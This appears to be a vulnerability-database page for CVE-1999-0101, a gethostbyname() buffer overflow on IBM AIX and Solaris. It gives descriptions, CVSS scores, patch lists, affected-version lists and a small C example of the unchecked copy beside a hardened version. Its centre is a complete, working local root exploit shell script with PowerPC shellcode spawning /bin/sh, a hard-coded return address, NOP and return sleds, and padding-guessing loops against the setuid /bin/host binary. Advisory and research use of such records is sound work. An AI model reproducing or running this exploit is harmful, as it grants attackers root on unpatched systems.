CVE-1999-0101
CVSS 10.0
Published: 1996-12-10 00:00:00
Revised: 2008-09-09 08:33:45

[Original text] Buffer overflow in AIX and Solaris "gethostbyname" library call allows root access through corrupt DNS host names.


[CNNVD] Multiple vendor gethostbyname() implementation remote buffer overflow vulnerability (CNNVD-199612-008)

        
gethostbyname() is a library function used to obtain a network address from a host name, and it is present on many operating systems.
When gethostbyname() copies data into a local memory buffer it performs no proper bounds check. A local or remote attacker can exploit this to trigger a buffer overflow and may execute arbitrary instructions on the system with the privileges of the program that calls the function.
When a program on a UNIX system needs to look up a host name and obtain its network address, it normally calls the "gethostbyname()" library function to resolve it. The function takes the host name obtained from the Domain Name System as its parameter and returns the host address to the program. Because that input is not bounds-checked, an over-long host name supplied by an attacker triggers a buffer overflow, and carefully crafted data can execute arbitrary instructions on the system with the privileges of the process that called the library function.
        
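As an added illustration of the defect class described above (not code from this record, from IBM or Sun, or from the exploit author), a resolver routine that copies a DNS-supplied host name into a fixed-size buffer with no length check, beside a hardened copy that enforces the RFC 1035 name and label limits and the buffer size. HOSTBUF_LEN, the function names and the buffer layout are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Constructed illustration of the defect class behind CVE-1999-0101, not
 * IBM's or Sun's libc. A resolver keeps the canonical host name from the DNS
 * reply in a fixed-size buffer; the size is an assumption. */
#define HOSTBUF_LEN 256

/* Vulnerable shape: the reply is copied with no length check, so a name
 * longer than HOSTBUF_LEN - 1 bytes overruns the buffer. */
void copy_name_unchecked(char dst[HOSTBUF_LEN], const char *name)
{
    strcpy(dst, name);
}

/* Hardened shape: enforce the RFC 1035 limits (label <= 63 octets, name
 * <= 255 octets), the hostname character set and the buffer size, and
 * reject the reply instead of truncating or overrunning. A trailing root
 * dot is not accepted. Returns 0 on success, -1 on rejection (dst untouched). */
int copy_name_checked(char dst[HOSTBUF_LEN], const char *name)
{
    size_t len = strlen(name), label = 0;
    if (len == 0 || len > 255 || len >= HOSTBUF_LEN)
        return -1;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '.') {                /* label boundary */
            if (label == 0)            /* leading dot or empty label */
                return -1;
            label = 0;
        } else if (!isalnum(c) && c != '-') {
            return -1;
        } else if (++label > 63) {
            return -1;
        }
    }
    if (label == 0)                    /* name ended with a dot */
        return -1;
    memcpy(dst, name, len + 1);
    return 0;
}

/* Validate a name into a scratch buffer; handy for callers and tests. */
int check_name(const char *name)
{
    char scratch[HOSTBUF_LEN];
    return copy_name_checked(scratch, name);
}
```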

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:ibm:aix:4.1    IBM AIX 4.1
cpe:/o:ibm:aix:3.2    IBM AIX 3.2
cpe:/o:ibm:aix:4.2    IBM AIX 4.2

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0101
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0101
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199612-008
(official data source) CNNVD

- Other links and resources

http://ciac.llnl.gov/ciac/bulletins/h-13.shtml
(VENDOR_ADVISORY)  CIAC  H-13

- Vulnerability information

Multiple vendor gethostbyname() implementation remote buffer overflow vulnerability
Critical  Other
1996-12-10 00:00:00 2005-10-12 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patches:
        IBM
        ---
        The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:
        IBM AIX 3.1:
        IBM AIX 3.2:
        IBM APAR IX60927
        IBM AIX 3.2.4:
        IBM APAR IX60927
        IBM AIX 3.2.5:
        IBM APAR IX60927
        IBM AIX 4.1:
        IBM APAR IX61019
        IBM AIX 4.1.1:
        IBM APAR IX61019
        IBM AIX 4.1.2:
        IBM APAR IX61019
        IBM AIX 4.1.3:
        IBM APAR IX61019
        IBM AIX 4.1.4:
        IBM APAR IX61019
        IBM AIX 4.1.5:
        IBM APAR IX61019
        IBM AIX 4.2:
        IBM APAR IX62144
        IBM AIX 4.2.1:
        IBM APAR IX62144
        
        http://service.software.ibm.com/aixsupport/

        Sun
        ---
        The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:
        Sun Patch 103187-09
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=103187&rev=09

        Sun SunOS 5.5.1 _x86:
        Sun Patch 103614-06
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=103614&rev=06

- Vulnerability information (22251)

AIX 3.x/4.x,Windows 95/98/2000/NT 4,SunOS 5 gethostbyname() Buffer Overflow (EDBID:22251)
multiple remote
2006-09-28 Verified
0 RoMaNSoFt
N/A
source: http://www.securityfocus.com/bid/6853/info

A vulnerability has been discovered in multiple vendor implementations of the 'gethostbyname()' library function, which is used to resolve network addresses.

The 'gethostbyname()' function fails to implement sufficient bounds checking on data copied into local memory buffers.

Under some circumstances, attackers may exploit this issue to overwrite sensitive locations in memory and may leverage the issue to execute arbitrary commands with the privileges of the vulnerable application. This issue may be local or remote, depending on the particular applications that use the function on vulnerable systems.

Several applications may implement the 'gethostbyname()' function, thus exposing them to this vulnerability. Applications known to implement 'gethostbyname()' include various implementations of 'ping', 'ftp', and 'tftp'. Other applications may also be vulnerable. 

#!/bin/sh

#######################################
## Local r00t 'shell-exploit' for:   ##
## gethostbyname() Buffer Overflow   ##
## [ BID 6853 / CVE-1999-0101 ]      ##
##            - - -                  ##
## By Roman Medina-Heigl Hernandez   ##
## aka RoMaNSoFt <roman@rs-labs.com> ##
##                                   ##
## Madrid, 28.Sep.2006               ##
## ================================= ##
## Public release. Version 1.        ##
## --------------------------------- ##
##   -= http://www.rs-labs.com/ =-   ##
#######################################


#############################################################################
#                                                                           #
#  This is merely a proof of concept for what I call a "shell-exploit"      #
#                                                                           #
#  * Original IBM Advisory: ERS-SVA-E01-1996:007.1  (03.Dec.1996)           #
#  * Affected platforms: IBM AIX(r) 3.2.x, 4.1.x, 4.2.x                     #
#  * Exploit tested on: PowerPC-604 running AIX 4.1.4.0                     #
#  * No need to use a compiler, perl, etc. Shell-scripting power!           #
#    Now you know what a pure 'shell-exploit' is  :-)                       #
#  * Syntax:                                                                #
#    % ./rs_aix_host.sh [RET length] [NOP length] [4140|41|42]              #
#                                                                           #
###############################################################--[ EOT ]--###


### Default configuration
ret_length=100
nop_length=300

### Return Address
# AIX 4.1.4.0 - Tested
TGT4140="AIX 4.1.4.0"
RET4140="\057\362\054\330"	# 0x2ff22cd8
# Generic AIX 4.1 - Untested, we assume the former one. Mail me if you have a better guess
TGT41="AIX 4.1.x"
RET41=$RET4140
# Generic AIX 4.2 - Untested, we assume the former one. Mail me if you have a better guess
TGT42="AIX 4.2.x"
RET42=$RET4140

### Shellcode (LSD's Asmcodes - PowerPC/AIX)
#
# char _shellcode[]=        /* 12*4+8 bytes                 */
#    "\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5             */
#    "\x40\x82\xff\xfd"     /* bnel    <shellcode>          */
#    "\x7f\xe8\x02\xa6"     /* mflr    r31                  */
#    "\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)       */
#    "\x38\x7f\xff\x08"     /* cal     r3,-248(r31)         */
#    "\x38\x9f\xff\x10"     /* cal     r4,-240(r31)         */
#    "\x90\x7f\xff\x10"     /* st      r3,-240(r31)         */
#    "\x90\xbf\xff\x14"     /* st      r5,-236(r31)         */
#    "\x88\x5f\xff\x0f"     /* lbz     r2,-241(r31)         */
#    "\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)         */
#    "\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6          */
#    "\x44\xff\xff\x02"     /* svca                         */
#    "/bin/sh"
# #ifdef V41
#    "\x03"
# #endif
# #ifdef V42
#    "\x02"
# #endif

PARTIALCODE="\
\174\245\052\171\100\202\377\375\177\350\002\246\073\377\001\040\
\070\177\377\010\070\237\377\020\220\177\377\020\220\277\377\024\
\210\137\377\017\230\277\377\017\114\306\063\102\104\377\377\002\
\057\142\151\156\057\163\150\
"
# AIX 4.1
SHELLCODE41=$PARTIALCODE"\003"
# AIX 4.2
SHELLCODE42=$PARTIALCODE"\002"

### NOP
NOP="\117\377\373\202"	# 0x4ffffb82   /* cror 31,31,31 */

### Setuid binary (target)
CMD=/bin/host

### Functions
oct2bin_setup()
{
	# Better to use printf binary if present
	if [ `printf "dSR"` = "dSR" ] >/dev/null 2>&1 ; then
		_PRINTCMD="printf"
		_SYSV=""
	elif [ `echo "RS\c"` = "RS" ] >/dev/null 2>&1 ; then
		# System V
		_PRINTCMD="echo"
		_SYSV="\c"
	else
		# Linux/BSD
		_PRINTCMD="echo -n -e"
		_SYSV=""
	fi

	if ! [ `$_PRINTCMD "dSR"$_SYSV` = "dSR" ] >/dev/null 2>&1 ; then
		echo "Sorry, I don't know how to write raw binary data :-("
		echo "Please, modify oct2bin* functions and try again!"
		exit 2
	fi
}

oct2bin()
{
	$_PRINTCMD $1$_SYSV
}

printhex()
{
	oct2bin $1 | od -t x4 -A n | tr -cd 0123456789abcdefABCDEF
}


### Exploit really starts here...
echo "#######################################"
echo "## Local r00t 'shell-exploit' for:   ##"
echo "## gethostbyname() Buffer Overflow   ##"
echo "## [ BID 6853 / CVE-1999-0101 ]      ##"
echo "##   . . . . . . . . . . . . . . .   ##"
echo "## By: RoMaNSoFt <roman@rs-labs.com> ##"
echo "#######################################"
echo

### Check target binary
if [ -x $CMD -a -u $CMD ] ; then
	echo "[*] Target binary has suid bit [$CMD]"
else
	echo "Sorry, target doesn't exist or it's not suid or cannot be executed"
	exit 3
fi

### We accept (optional) parameters
if [ $1 ] ; then
	ret_length=$1
fi

if [ $2 ] ; then
	nop_length=$2
fi

# Default target platform
TARGET=$TGT4140
RET=$RET4140
SHELLCODE=$SHELLCODE41

if [ $3 ] ; then
	if [ $3 = "4140" ] ; then
		TARGET=$TGT4140
		RET=$RET4140
		SHELLCODE=$SHELLCODE41
	elif [ $3 = "41" ] ; then
		TARGET=$TGT41
		RET=$RET41
		SHELLCODE=$SHELLCODE41
	elif [ $3 = "42" ] ; then
		TARGET=$TGT42
		RET=$RET42
		SHELLCODE=$SHELLCODE42
	fi
fi

### First, we convert octal strings to raw binary
oct2bin_setup
RET=`oct2bin $RET`
NOP=`oct2bin $NOP`
SHELLCODE=`oct2bin $SHELLCODE`

### Second, we create the NOP & RET sleds
echo "[*] Setting up exploitation environment..."

ret_sled=""
i=$ret_length
while [ $i != 0 ]; do
	ret_sled=$ret_sled$RET
	i=$(($i-1))
done

nop_sled=""
i=$nop_length
while [ $i != 0 ]; do
	nop_sled=$nop_sled$NOP
	i=$(($i-1))
done

echo "--> TARGET = $TARGET // RET = 0x"`printhex $RET`" // RETs = $ret_length //"\
     " NOPs = $nop_length <--"

### Prior to exploitation the environment will be un-exported to preserve memory layout
### and previous RET calculations
for i in `env | cut -d= -f1` ; do
	typeset +x $i
done

### Exploit it!
echo "[*] Exploiting..."
PAD="A"
ipad="A"
i=0
SUCCESS=0
while [ $i -lt 4 ]; do
	jpad=""
	j=0
	while [ $j -lt 4 ]; do
		EGG=$ipad$nop_sled$SHELLCODE $CMD $jpad$ret_sled
		if [ $? = 0 ]; then
			SUCCESS=1
			break 2
		fi
		jpad=$PAD$jpad
		j=$(($j+1))
	done
	ipad=$PAD$ipad
	i=$(($i+1))
done

### Finish politely ;-)
if [ $SUCCESS = 1 ]; then
	echo "--> Guessed PAD: EGG = $i // RET = $j <--"
	echo "Owned :-)"
	STATUS=0
else
	echo "Bad luck :-("
	STATUS=1
fi

exit $STATUS

# --[ EOT ]--		

- Vulnerability information (F50586)

rs_aix_host.sh (PacketStormID:F50586)
2006-10-04 00:00:00
Roman Medina-Heigl Hernandez aka RoMaNSoFt  rs-labs.com
exploit,overflow,shell
aix
CVE-1999-0101

Shell exploit for AIX gethostbyname() Buffer Overflow vulnerability circa 1996.

- Vulnerability information

7990
ISC BIND gethostbyname() DNS Handling Remote Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability description

- Timeline

1996-02-22 Unknown
Unknown Unknown

- Solution

Upgrade ISC BIND to version 4.9.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Multiple Vendor gethostbyname() Buffer Overflow Vulnerability
Boundary Condition Error 6853
Yes No
1996-12-03 12:00:00 2006-10-03 05:30:00
This vulnerability was discovered by the vendor.

- Affected program versions

Sun SunOS 5.5.1 _x86
Sun SunOS 5.5 _x86
Sun SunOS 5.5
Sun SunOS 5.1.1 _ppc
Sun SunOS 5.1.1
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98
Microsoft Windows 95 SR2
Microsoft Windows 95
Microsoft Windows 2000 Terminal Services SP3
+ Microsoft Windows 2000 Advanced Server SP3
+ Microsoft Windows 2000 Datacenter Server SP3
+ Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
IBM AIX 4.2.1
IBM AIX 4.2
IBM AIX 4.1.5
IBM AIX 4.1.4
IBM AIX 4.1.3
IBM AIX 4.1.2
IBM AIX 4.1.1
IBM AIX 4.1
IBM AIX 3.2.5
IBM AIX 3.2.4
IBM AIX 3.2
IBM AIX 3.1
IBM AIX 3.0 x


- Exploit

The following exploit is available:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.


IBM AIX 3.2
  • IBM IX60927


IBM AIX 3.2.4
  • IBM IX60927


IBM AIX 3.2.5
  • IBM IX60927


IBM AIX 4.1
  • IBM IX61019


IBM AIX 4.1.1
  • IBM IX61019


IBM AIX 4.1.2
  • IBM IX61019


IBM AIX 4.1.3
  • IBM IX61019


IBM AIX 4.1.4
  • IBM IX61019


IBM AIX 4.1.5
  • IBM IX61019


IBM AIX 4.2
  • IBM IX62144


IBM AIX 4.2.1
  • IBM IX62144


Sun SunOS 5.5

Sun SunOS 5.5.1 _x86

- References